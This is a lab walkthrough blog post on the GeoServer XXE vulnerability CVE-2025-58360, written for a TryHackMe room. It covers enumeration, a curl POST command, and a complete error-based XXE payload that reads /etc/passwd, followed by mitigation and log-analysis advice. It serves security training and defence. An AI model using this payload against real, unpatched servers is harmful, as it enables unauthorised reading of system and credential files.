By Motasem Hamdan in TryHackMe — 06 Feb 2026

Deconstructing GeoServer's 2025 XXE | TryHackMe Walkthrough

In GeoServer CVE-2025-58360, we are dealing with an XML External Entity (XXE) vulnerability in 2025, a flaw that arguably should have been extinct a decade ago.

The challenge forces you to stop thinking like a script kiddie looking for a Metasploit module and start thinking like a protocol auditor who understands that the standards defining the web (like OGC's WMS) are often the very vectors that betray it.

What This Vulnerability Really Tests

At its core, it is a rigorous examination of your ability to manipulate Structured Data Protocols beyond standard HTTP parameter fuzzing.

It tests your competency in Protocol Switching recognizing that while a Web Map Service (WMS) is typically queried via GET requests in a browser (e.g., ?request=GetMap), the specification mandates support for XML-based POST requests.

This is where the vulnerability lives. The room challenges you to identify that the application's XML parser is configured promiscuously, allowing Document Type Definitions (DTDs) to define external entities.

It tests your ability to craft Out-of-Band or Error-Based data exfiltration payloads, verifying if you can trick a Java application into reading its own filesystem (/etc/passwd) and spitting the content back at you in an error log. It is a test of white-box logic applied to a black-box endpoint.

Enumeration Methodology

The standard directory-busting approach is functionally useless here because the endpoint /geoserver/wms is likely already known or easily discovered. The elite methodology requires a Method Swapping audit.

When you encounter a RESTful or SOAP-like endpoint that behaves normally with GET requests, your immediate instinct must be to test its behavior with POST. You are looking for the Content-Type disparity.

In this specific case, you interact with the GetMap operation. Standard enumeration involves capturing a legitimate GET request for a map layer (like trymapme_offices) and converting it into its XML equivalent.

You aren't just looking for a 200 OK; you are probing the parser.

You send a minimal XML structure to see if the server accepts it. If it does, you inject a benign DTD (like defining an entity &test; with the value "hello") to see if the server resolves it. If "hello" appears in the error message or the rendered map label, you have confirmed the parser is vulnerable.

Commands Cheat Sheet

While the logic is paramount, having the precision syntax is critical for exploitation, especially when dealing with the strict XML formatting required by GeoServer.

The Execution Command

Use curl to fire this XML at the WMS endpoint, ensuring the Content-Type is strictly set to generic XML or the specific WMS mime-type. curl -X POST -H "Content-Type: application/xml" -d @payload.xml http://<TARGET_IP>/geoserver/wms

The Error-Based XXE Payload:

This payload constructs a malicious XML POST request that defines an external entity pointing to the sensitive file. We place the entity reference &xxe; inside a field we know the server will process (and likely fail on, revealing the data in the error).XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<GetMap service="WMS" version="1.1.1">
  <StyledLayerDescriptor version="1.0.0">
    <UserLayer>
      <Name>trymapme_offices</Name>
      <UserStyle>
        <Name>&xxe;</Name> <FeatureTypeStyle>
          <Rule>
            <PointSymbolizer/>
          </Rule>
        </FeatureTypeStyle>
      </UserStyle>
    </UserLayer>
  </StyledLayerDescriptor>
</GetMap>

Common Mistakes

The most fatal error on this box is Protocol rigidity. Researchers often try to inject the XXE payload into the URL parameters of a GET request, which will fail because the vulnerable code path is triggered only when the XML parser is invoked via the request body. Another common mistake is Ignoring the Error Logs.

In this specific CVE, the data exfiltration often happens via verbose error messages. If you are expecting the /etc/passwd file to be rendered as a map image, you will be disappointed.

You must read the HTTP response body (the XML error) to find the leaked text. Finally, many testers fail to properly structure the OGC-compliant XML wrapper (GetMap, StyledLayerDescriptor), causing the server to reject the request as "Malformed" before the parser even reaches the malicious DTD.

Tool Usage Patterns

This environment demands a surgical approach to tooling. Burp Suite Professional (or Community) is essential, particularly the Repeater tab, as it allows you to rapidly iterate on the XML structure and view the raw response headers and body.

You will be heavily relying on the Send to Repeater workflow. However, for the initial discovery or if you are working from a headless AttackBox, curl is your scalpel. You need to become comfortable using curl with the -d @filename flag to send clean, pre-formatted XML files, avoiding the escaping hell of trying to put XML into a command-line string.

Automated scanners like SQLMap are useless here; this is a logic flaw in the parser, not a database injection (though it feels similar).

Security Lesson & Mitigation

The primary lesson from CVE-2025-58360 is that default configurations are often insecure. GeoServer vulnerabilities frequently arise because the underlying XML parsers (often provided by Java libraries) have external entity resolution enabled by default.

Mitigation

The fix is rarely in the code logic but in the parser configuration. Developers must explicitly disable DTD processing in their DocumentBuilderFactory settings (setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)).

Infrastructure Defense

On the network level, egress filtering is critical. If the XXE was Blind (no error output), the attacker would try to make the server call out to their machine. Blocking the server from initiating outbound connections to the internet or internal subnets neuters the SSRF component of this attack.

Expert Hints

If you are investigating the logs to answer the room's questions, pay close attention to the geoserver_app.log. The vulnerability is "noisy." When the attacker (or you) forces the server to read a file that isn't a valid style descriptor, the server throws an exception.

That exception contains the content of the file it tried to parse. Look for stack traces that seem to contain "root:x:0:0" strings—that's your stolen password file. Also, remember that the "flag" might not be in a standard text file; the attacker might have used the XXE to list directories or read application config files to find it.

Certifications Prep Suggestions

This machine is an ideal training ground for intermediate-to-advanced certifications that require manual web application exploitation:

OSWE (OffSec Web Expert): The requirement to construct a valid XML payload based on reading documentation (OGC standards) and then exploiting it is the core of the OSWE exam.

BSCP (Burp Suite Certified Practitioner): This is a textbook example of "XML External Entity injection," a category that frequently appears in the BSCP exam's mystery labs.

eWPTX (eLearnSecurity Web Penetration Tester eXtreme): The need to pivot from a known service (WMS) to an exploitation vector fits perfectly with the eWPTX syllabus.

Join the Cyber Security Notes Membership: